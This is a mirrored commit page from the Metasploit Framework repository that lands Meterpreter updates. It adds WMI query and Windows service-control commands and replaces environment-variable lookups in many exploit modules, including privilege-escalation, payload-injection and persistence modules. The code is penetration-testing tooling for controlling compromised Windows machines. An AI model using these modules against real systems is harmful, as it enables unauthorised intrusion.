infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #3122, lots of Meterpreter updates 

This lands the binaries built from Meterpreter as of:

rapid7/meterpreter#80 , also known as

commit 5addac75741fadfff35f4f7839cee6fd69705455

as well as the functional changes in:

rapid7/metasploit-framework#2782
rapid7/metasploit-framework#2889
rapid7/metasploit-framework#3061
rapid7/metasploit-framework#3085
bug/bundler_fix
Tod Beardsley 2014-03-19 15:35:49 -05:00
parent fe0b76e24e 05436dc2c5
commit c1cbeff5f0
No known key found for this signature in database
GPG Key ID: 1EFFB682ADB9F193
109 changed files with 495 additions and 214 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/meterpreter/common.lib
View File

Binary file not shown.

BIN
data/meterpreter/elevator.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/elevator.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_extapi.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_extapi.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_incognito.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_incognito.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_lanattacks.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_lanattacks.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_mimikatz.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_mimikatz.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/metsrv.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/metsrv.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.x86.dll
View File

Binary file not shown.

14
lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb
View File

@ -134,14 +134,16 @@ private
result[ts]['Text'] = t.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT)
end
response.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE) do |f|
ts = f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_TIMESTAMP)
response.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILES) do |fs|
ts = fs.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_TIMESTAMP)
result[ts] ||= {}
result[ts]['Files'] ||= []
result[ts]['Files'] << {
:name => f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME),
:size => f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE)
}
fs.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE) do |f|
result[ts]['Files'] << {
:name => f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME),
:size => f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE)
}
end
end
response.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG) do |jpg|

8
lib/rex/post/meterpreter/extensions/extapi/extapi.rb
View File

@ -5,6 +5,7 @@ require 'rex/post/meterpreter/extensions/extapi/window/window'
require 'rex/post/meterpreter/extensions/extapi/service/service'
require 'rex/post/meterpreter/extensions/extapi/clipboard/clipboard'
require 'rex/post/meterpreter/extensions/extapi/adsi/adsi'
require 'rex/post/meterpreter/extensions/extapi/wmi/wmi'
module Rex
module Post
@ -29,10 +30,11 @@ class Extapi < Extension
'name' => 'extapi',
'ext' => ObjectAliases.new(
{
'window' => Rex::Post::Meterpreter::Extensions::Extapi::Window::Window.new(client),
'service' => Rex::Post::Meterpreter::Extensions::Extapi::Service::Service.new(client),
'window' => Rex::Post::Meterpreter::Extensions::Extapi::Window::Window.new(client),
'service' => Rex::Post::Meterpreter::Extensions::Extapi::Service::Service.new(client),
'clipboard' => Rex::Post::Meterpreter::Extensions::Extapi::Clipboard::Clipboard.new(client),
'adsi' => Rex::Post::Meterpreter::Extensions::Extapi::Adsi::Adsi.new(client)
'adsi' => Rex::Post::Meterpreter::Extensions::Extapi::Adsi::Adsi.new(client),
'wmi' => Rex::Post::Meterpreter::Extensions::Extapi::Wmi::Wmi.new(client)
})
},
])

50
lib/rex/post/meterpreter/extensions/extapi/service/service.rb
View File

@ -15,18 +15,26 @@ module Service
###
class Service
SERVICE_OP_START = 1
SERVICE_OP_PAUSE = 2
SERVICE_OP_RESUME = 3
SERVICE_OP_STOP = 4
SERVICE_OP_RESTART = 5
def initialize(client)
@client = client
end
#
# Enumerate all the services on the target.
#
def enumerate
request = Packet.create_request('extapi_service_enum')
response = client.send_request(request)
services = []
response.each(TLV_TYPE_EXT_SERVICE_ENUM_GROUP) { |s|
response.each(TLV_TYPE_EXT_SERVICE_ENUM_GROUP) do |s|
services << {
:name => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_NAME),
:display => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_DISPLAYNAME),
@ -34,29 +42,59 @@ class Service
:status => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_STATUS),
:interactive => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_INTERACTIVE)
}
}
end
return services.sort_by { |s| s[:name].upcase }
services.sort_by { |s| s[:name].upcase }
end
#
# Query some detailed parameters about a particular service.
#
def query(service_name)
request = Packet.create_request('extapi_service_query')
request.add_tlv(TLV_TYPE_EXT_SERVICE_ENUM_NAME, service_name)
response = client.send_request(request)
detail = {
{
:starttype => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_STARTTYPE),
:display => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_DISPLAYNAME),
:startname => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_STARTNAME),
:path => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_PATH),
:logroup => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_LOADORDERGROUP),
:interactive => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_INTERACTIVE),
:dacl => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_DACL)
:dacl => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_DACL),
:status => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_STATUS)
}
end
return detail
#
# Control a single service
#
def control(service_name, op)
if op.is_a? String
case op.strip.downcase
when "start"
op = SERVICE_OP_START
when "pause"
op = SERVICE_OP_PAUSE
when "resume"
op = SERVICE_OP_RESUME
when "stop"
op = SERVICE_OP_STOP
when "restart"
op = SERVICE_OP_RESTART
end
end
unless (op.is_a? Integer) && op >= SERVICE_OP_START && op <= SERVICE_OP_RESTART
raise ArgumentError, "Invalid operation: #{op}"
end
request = Packet.create_request('extapi_service_control')
request.add_tlv(TLV_TYPE_EXT_SERVICE_CTRL_NAME, service_name)
request.add_tlv(TLV_TYPE_EXT_SERVICE_CTRL_OP, op)
client.send_request(request)
end
attr_accessor :client

13
lib/rex/post/meterpreter/extensions/extapi/tlv.rb
View File

@ -27,6 +27,10 @@ TLV_TYPE_EXT_SERVICE_QUERY_PATH = TLV_META_TYPE_STRING | (TLV_TYPE_E
TLV_TYPE_EXT_SERVICE_QUERY_LOADORDERGROUP = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 24)
TLV_TYPE_EXT_SERVICE_QUERY_INTERACTIVE = TLV_META_TYPE_BOOL | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 25)
TLV_TYPE_EXT_SERVICE_QUERY_DACL = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 26)
TLV_TYPE_EXT_SERVICE_QUERY_STATUS = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 27)
TLV_TYPE_EXT_SERVICE_CTRL_NAME = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 28)
TLV_TYPE_EXT_SERVICE_CTRL_OP = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 29)
TLV_TYPE_EXT_CLIPBOARD_DOWNLOAD = TLV_META_TYPE_BOOL | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 35)
@ -38,6 +42,7 @@ TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT = TLV_META_TYPE_STRING | (TLV_TYPE_E
TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 41)
TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 42)
TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE = TLV_META_TYPE_QWORD | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 43)
TLV_TYPE_EXT_CLIPBOARD_TYPE_FILES = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 44)
TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 45)
TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DIMX = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 46)
@ -57,6 +62,14 @@ TLV_TYPE_EXT_ADSI_RESULT = TLV_META_TYPE_GROUP | (TLV_TYPE_E
TLV_TYPE_EXT_ADSI_MAXRESULTS = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 60)
TLV_TYPE_EXT_ADSI_PAGESIZE = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 61)
TLV_TYPE_EXT_WMI_DOMAIN = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 65)
TLV_TYPE_EXT_WMI_QUERY = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 66)
TLV_TYPE_EXT_WMI_FIELD = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 67)
TLV_TYPE_EXT_WMI_VALUE = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 68)
TLV_TYPE_EXT_WMI_FIELDS = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 69)
TLV_TYPE_EXT_WMI_VALUES = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 70)
TLV_TYPE_EXT_WMI_ERROR = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 71)
end
end
end

75
lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb Normal file
View File

@ -0,0 +1,75 @@
# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
module Extensions
module Extapi
module Wmi
###
#
# This meterpreter extension contains extended API functions for
# performing WMI queries.
#
###
class Wmi
def initialize(client)
@client = client
end
#
# Perform a generic wmi query against the target machine.
#
# @param query [String] The WMI query string.
# @param root [String] Specify root to target, otherwise defaults
# to 'root\cimv2'
#
# @returns [Hash] Array of field names with associated values.
#
def query(query, root = nil)
request = Packet.create_request('extapi_wmi_query')
request.add_tlv(TLV_TYPE_EXT_WMI_DOMAIN, root) unless root.blank?
request.add_tlv(TLV_TYPE_EXT_WMI_QUERY, query)
response = client.send_request(request)
# Bomb out with the right error messa
error_msg = response.get_tlv_value(TLV_TYPE_EXT_WMI_ERROR)
raise error_msg if error_msg
fields = []
fields_tlv = response.get_tlv(TLV_TYPE_EXT_WMI_FIELDS)
# If we didn't get any fields back, then we didn't get any results.
# The reason is because without results, we don't know which fields
# were requested in the first place
return nil unless fields_tlv
fields_tlv.each(TLV_TYPE_EXT_WMI_FIELD) { |f|
fields << f.value
}
values = []
response.each(TLV_TYPE_EXT_WMI_VALUES) { |r|
value = []
r.each(TLV_TYPE_EXT_WMI_VALUE) { |v|
value << v.value
}
values << value
}
return {
:fields => fields,
:values => values
}
end
attr_accessor :client
end
end; end; end; end; end; end

4
lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi.rb
View File

@ -17,6 +17,7 @@ class Console::CommandDispatcher::Extapi
require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/service'
require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard'
require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi'
require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi'
Klass = Console::CommandDispatcher::Extapi
@ -25,7 +26,8 @@ class Console::CommandDispatcher::Extapi
Klass::Window,
Klass::Service,
Klass::Clipboard,
Klass::Adsi
Klass::Adsi,
Klass::Wmi
]
include Console::CommandDispatcher

101
lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb
View File

@ -22,8 +22,9 @@ class Console::CommandDispatcher::Extapi::Service
#
def commands
{
"service_enum" => "Enumerate all registered Windows services",
"service_query" => "Query more detail about a specific Windows service"
"service_enum" => "Enumerate all registered Windows services",
"service_query" => "Query more detail about a specific Windows service",
"service_control" => "Control a single service (start/pause/resume/stop/restart)"
}
end
@ -33,6 +34,32 @@ class Console::CommandDispatcher::Extapi::Service
def name
"Extapi: Service Management"
end
#
# Initialize the instance
#
def initialize(shell)
super
@status_map = {
1 => "Stopped",
2 => "Starting",
3 => "Stopping",
4 => "Running",
5 => "Continuing",
6 => "Pausing",
7 => "Paused"
}
@start_type_map = {
0 => "Boot",
1 => "System",
2 => "Automatic",
3 => "Manual",
4 => "Disabled"
}
end
#
# Options for the service_enum command.
#
@ -44,7 +71,7 @@ class Console::CommandDispatcher::Extapi::Service
# Query a single service for more detail.
#
def cmd_service_enum(*args)
@@service_enum_opts.parse(args) { |opt, idx, val|
@@service_enum_opts.parse(args) do |opt, idx, val|
case opt
when "-h"
print(
@ -55,17 +82,7 @@ class Console::CommandDispatcher::Extapi::Service
"able to interact with the desktop.\n\n")
return true
end
}
status_map = {
1 => "Stopped",
2 => "Starting",
3 => "Stopping",
4 => "Running",
5 => "Continuing",
6 => "Pausing",
7 => "Paused"
}
end
services = client.extapi.service.enumerate
@ -78,14 +95,14 @@ class Console::CommandDispatcher::Extapi::Service
]
)
services.each { |s|
services.each do |s|
table << [
s[:pid],
status_map[s[:status]],
@status_map[s[:status]],
s[:interactive] ? "Y" : "N",
"#{s[:name].downcase} (#{s[:display]})"
]
}
end
print_line
print_line(table.to_s)
@ -107,9 +124,9 @@ class Console::CommandDispatcher::Extapi::Service
# Query a single service for more detail.
#
def cmd_service_query(*args)
args << "-h" if args.length == 0
args.unshift("-h") if args.length != 1
@@service_query_opts.parse(args) { |opt, idx, val|
@@service_query_opts.parse(args) do |opt, idx, val|
case opt
when "-h"
print(
@ -119,25 +136,18 @@ class Console::CommandDispatcher::Extapi::Service
"binary path, DACL, load order group, start type and more.\n\n")
return true
end
}
end
service_name = args.shift
start_type_map = {
0 => "Boot",
1 => "System",
2 => "Automatic",
3 => "Manual",
4 => "Disabled"
}
detail = client.extapi.service.query(service_name)
print_line
print_line("Name : #{service_name}")
print_line("Display : #{detail[:display]}")
print_line("Account : #{detail[:startname]}")
print_line("Start Type : #{start_type_map[detail[:starttype]]}")
print_line("Status : #{@status_map[detail[:status]]}")
print_line("Start Type : #{@start_type_map[detail[:starttype]]}")
print_line("Path : #{detail[:path]}")
print_line("L.O. Group : #{detail[:logroup]}")
print_line("Interactive : #{detail[:interactive] ? "Yes" : "No"}")
@ -146,6 +156,39 @@ class Console::CommandDispatcher::Extapi::Service
end
#
# Options for the service_control command.
#
@@service_control_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner" ]
)
#
# Query a single service for more detail.
#
def cmd_service_control(*args)
args.unshift("-h") if args.length != 2
@@service_control_opts.parse(args) do |opt, idx, val|
case opt
when "-h"
print(
"\nUsage: service_control [-h] <servicename> <op>\n" +
" <servicename> : The name of the service to control.\n" +
" <op> : The operation to perform on the service.\n" +
" Valid ops: start pause resume stop restart.\n\n")
return true
end
end
service_name = args[0]
op = args[1]
client.extapi.service.control(service_name, op)
print_good("Operation #{op} succeeded.")
end
end
end

108
lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb Normal file
View File

@ -0,0 +1,108 @@
# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
module Post
module Meterpreter
module Ui
###
#
# Extended API WMI Querying interface.
#
###
class Console::CommandDispatcher::Extapi::Wmi
Klass = Console::CommandDispatcher::Extapi::Wmi
include Console::CommandDispatcher
# Zero indicates "no limit"
DEFAULT_MAX_RESULTS = 0
DEFAULT_PAGE_SIZE = 0
#
# List of supported commands.
#
def commands
{
"wmi_query" => "Perform a generic WMI query and return the results"
}
end
#
# Name for this dispatcher
#
def name
"Extapi: WMI Querying"
end
#
# Options for the wmi_query command.
#
@@wmi_query_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner" ],
"-r" => [ true, "Specify a different root object (defaults to 'root\\CIMV2')" ]
)
def wmi_query_usage
print(
"\nUsage: wmi_query <query string> [-r root]\n\n" +
"Query the target and display the results.\n\n" +
@@wmi_query_opts.usage)
end
#
# Enumerate WMI objects.
#
def cmd_wmi_query(*args)
args.unshift("-h") if args.length < 1
root = nil
@@wmi_query_opts.parse(args) { |opt, idx, val|
case opt
when "-r"
root = val
when "-h"
wmi_query_usage
return true
end
}
query = args.shift
objects = client.extapi.wmi.query(query, root)
if objects
table = Rex::Ui::Text::Table.new(
'Header' => query,
'Indent' => 0,
'SortIndex' => 0,
'Columns' => objects[:fields]
)
objects[:values].each do |c|
table << c
end
print_line
print_line(table.to_s)
print_line("Total objects: #{objects[:values].length}")
else
print_status("The WMI query yielded no results.")
end
print_line
return true
end
end
end
end
end
end

2
modules/exploits/multi/http/struts_default_action_mapper.rb
View File

@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
begin
wintemp = session.fs.file.expand_path("%TEMP%")
wintemp = session.sys.config.getenv('TEMP')
win_file = "#{wintemp}\\#{win_file}"
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
session.fs.file.rm(win_file)

9
modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb
View File

@ -68,13 +68,11 @@ class Metasploit3 < Msf::Exploit::Remote
def on_new_session(session)
if session.type == "meterpreter"
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
end
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
begin
wintemp = session.fs.file.expand_path("%TEMP%")
wintemp = session.sys.config.getenv('TEMP')
win_file = "#{wintemp}\\#{win_file}"
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
session.fs.file.rm(win_file)
@ -84,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote
print_error("Failed to delete #{win_file}")
false
end
end
end
end

11
modules/exploits/windows/browser/honeywell_tema_exec.rb
View File

@ -74,13 +74,11 @@ class Metasploit3 < Msf::Exploit::Remote
def on_new_session(session)
if session.type == "meterpreter"
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
end
@dropped_files.each do |file|
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
@dropped_files.each do |file|
win_file = file.gsub("/", "\\\\")
begin
wintemp = session.fs.file.expand_path("%WINDIR%")
wintemp = session.sys.config.getenv('WINDIR')
win_file = "#{wintemp}\\Temp\\#{win_file}"
# Meterpreter should do this automatically as part of
# fs.file.rm(). Until that has been implemented, remove the
@ -93,7 +91,6 @@ class Metasploit3 < Msf::Exploit::Remote
print_error("Failed to delete #{win_file}")
false
end
end
end
@ -169,4 +166,4 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
end

11
modules/exploits/windows/browser/notes_handler_cmdinject.rb
View File

@ -72,13 +72,11 @@ class Metasploit3 < Msf::Exploit::Remote
def on_new_session(session)
if session.type == "meterpreter"
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
end
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
begin
wintemp = session.fs.file.expand_path("%TEMP%")
wintemp = session.sys.config.getenv('TEMP')
win_file = "#{wintemp}\\#{win_file}"
# Meterpreter should do this automatically as part of
# fs.file.rm(). Until that has been implemented, remove the
@ -91,7 +89,6 @@ class Metasploit3 < Msf::Exploit::Remote
print_error("Failed to delete #{win_file}")
false
end
end
end
@ -184,4 +181,4 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
end

11
modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb
View File

@ -66,13 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote
def on_new_session(session)
if session.type == "meterpreter"
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
end
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
begin
wintemp = session.fs.file.expand_path("%TEMP%")
wintemp = session.sys.config.getenv('TEMP')
win_file = "#{wintemp}\\#{win_file}"
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
session.fs.file.rm(win_file)
@ -82,7 +80,6 @@ class Metasploit3 < Msf::Exploit::Remote
print_error("Failed to delete #{win_file}")
false
end
end
end
end
@ -257,4 +254,4 @@ This code allows to launch other executables with user data provided as argument
solution because it allows to pass URL's as arguments. And code executed by mshta is on a privileged zone. Other
executables allow to provide SMB URI's but metasploit only allow to 'simulate' a SMB resource through webdav, so
the target should have the WebClient service enabled, which is only enabled by default on XP SP3.
=end
=end

2
modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb
View File

@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Use the system path for executable to run except the wordpad
if client.sys.config.sysinfo["OS"] =~ /Windows XP/
windir = client.fs.file.expand_path("%ProgramFiles%")
windir = client.sys.config.getenv('ProgramFiles')
cmd="#{windir}\\Windows NT\\Accessories\\wordpad.exe"
else # Windows 2000
cmd = "notepad.exe"

2
modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb
View File

@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local
# Usint this solution atm because I'm experiencing problems with railgun when trying
# use GetTokenInformation
def low_integrity_level?
tmp_dir = expand_path("%TEMP%")
tmp_dir = session.sys.config.getenv('TEMP')
cd(tmp_dir)
new_dir = "#{rand_text_alpha(5)}"
begin

2
modules/exploits/windows/local/agnitum_outpost_acs.rb
View File

@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Local
if datastore["WritableDir"] and not datastore["WritableDir"].empty?
temp_dir = datastore["WritableDir"]
else
temp_dir = expand_path("%TEMP%")
temp_dir = client.sys.config.getenv('TEMP')
end
print_status("Using #{temp_dir} to drop malicious DLL...")

2
modules/exploits/windows/local/ask.rb
View File

@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Local
if datastore["PATH"]
payload_path = datastore["PATH"]
else
payload_path = session.fs.file.expand_path("%TEMP%")
payload_path = session.sys.config.getenv('TEMP')
end
cmd_location = "#{payload_path}\\#{payload_filename}"

1
modules/exploits/windows/local/bypassuac.rb
View File

@ -42,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Local
end
def check_permissions!
# Check if you are an admin
vprint_status('Checking admin status...')

2
modules/exploits/windows/local/current_user_psexec.rb
View File

@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local
# Build a random name for the share and directory
share_name = Rex::Text.rand_text_alphanumeric(8)
drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
drive = session.sys.config.getenv('SYSTEMDRIVE')
share_dir = "#{drive}\\#{share_name}"
# Create them

4
modules/exploits/windows/local/ms10_092_schelevator.rb
View File

@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Local
cmd = datastore["CMD"] || nil
upload_fn = nil
tempdir = session.fs.file.expand_path("%TEMP%")
tempdir = session.sys.config.getenv('TEMP')
if not cmd
# Get the exe payload.
exe = generate_payload_exe
@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Local
# Create a new task to do our bidding, but make sure it doesn't run.
#
taskname ||= Rex::Text.rand_text_alphanumeric(8+rand(8))
sysdir = session.fs.file.expand_path("%SystemRoot%")
sysdir = session.sys.config.getenv('SystemRoot')
taskfile = "#{sysdir}\\system32\\tasks\\#{taskname}"
print_status("Creating task: #{taskname}")

6
modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
View File

@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Local
end
def low_integrity_level?
tmp_dir = expand_path("%USERPROFILE%")
tmp_dir = session.sys.config.getenv('USERPROFILE')
cd(tmp_dir)
new_dir = "#{rand_text_alpha(5)}"
begin
@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Local
if datastore['TECHNIQUE'] == 'FILE'
payload_file = "#{rand_text_alpha(5+rand(3))}.exe"
begin
tmp_dir = expand_path("%TEMP%")
tmp_dir = session.sys.config.getenv('TEMP')
tmp_dir << "\\Low" unless tmp_dir[-3,3] =~ /Low/i
cd(tmp_dir)
print_status("Trying to drop payload to #{tmp_dir}...")
@ -186,7 +186,7 @@ class Metasploit3 < Msf::Exploit::Local
# Spawn low integrity cmd.exe
print_status("Spawning Low Integrity Cmd Prompt")
windir = client.fs.file.expand_path("%windir%")
windir = session.sys.config.getenv('windir')
li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid
count = count_cmd_procs

2
modules/exploits/windows/local/ms_ndproxy.rb
View File

@ -193,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Local
end
def create_proc
windir = expand_path("%windir%")
windir = session.sys.config.getenv('windir')
cmd = "#{windir}\\System32\\notepad.exe"
# run hidden
begin

2
modules/exploits/windows/local/nvidia_nvsvc.rb
View File

@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Local
print_status("Launching notepad to host the exploit...")
windir = expand_path("%windir%")
windir = session.sys.config.getenv('windir')
cmd = "#{windir}\\SysWOW64\\notepad.exe"
process = client.sys.process.execute(cmd, nil, {'Hidden' => true})
host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)

2
modules/exploits/windows/local/payload_inject.rb
View File

@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Local
# Creates a temp notepad.exe to inject payload in to given the payload
# Returns process PID
def create_temp_proc()
windir = client.fs.file.expand_path("%windir%")
windir = client.sys.config.getenv('windir')
# Select path of executable to run depending the architecture
if @payload_arch.first== "x86" and client.platform =~ /x86/
cmd = "#{windir}\\System32\\notepad.exe"

2
modules/exploits/windows/local/persistence.rb
View File

@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Local
# Writes script to target host
def write_script_to_target(vbs,name)
tempdir = expand_path("%TEMP%")
tempdir = session.sys.config.getenv('TEMP')
if name == nil
tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
else

2
modules/exploits/windows/local/ppr_flatten_rec.rb
View File

@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Local
def check
os = sysinfo["OS"]
if os =~ /windows/i
file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
file_path = session.sys.config.getenv('windir') << "\\system32\\win32k.sys"
major, minor, build, revision, branch = file_version(file_path)
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision}")

2
modules/exploits/windows/local/s4u_persistence.rb
View File

@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Local
# Returns path for XML and payload
def generate_path(rexename)
# Generate a path to write payload and XML
path = datastore['PATH'] || expand_path("%TEMP%")
path = datastore['PATH'] || session.sys.config.getenv('TEMP')
xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml"
rexe_path = "#{path}\\#{rexename}"
return xml_path,rexe_path

7
modules/exploits/windows/local/service_permissions.rb
View File

@ -59,8 +59,9 @@ class Metasploit3 < Msf::Exploit::Local
exe = Msf::Util::EXE.to_win32pe_service(session.framework, raw)
sysdir = session.fs.file.expand_path("%SystemRoot%")
tmpdir = session.fs.file.expand_path("%TEMP%")
dir_env = session.sys.config.getenvs('SystemRoot', 'TEMP')
sysdir = dir_env['SystemRoot']
tmpdir = dir_env['TEMP']
print_status("Meterpreter stager executable #{exe.length} bytes long being uploaded..")
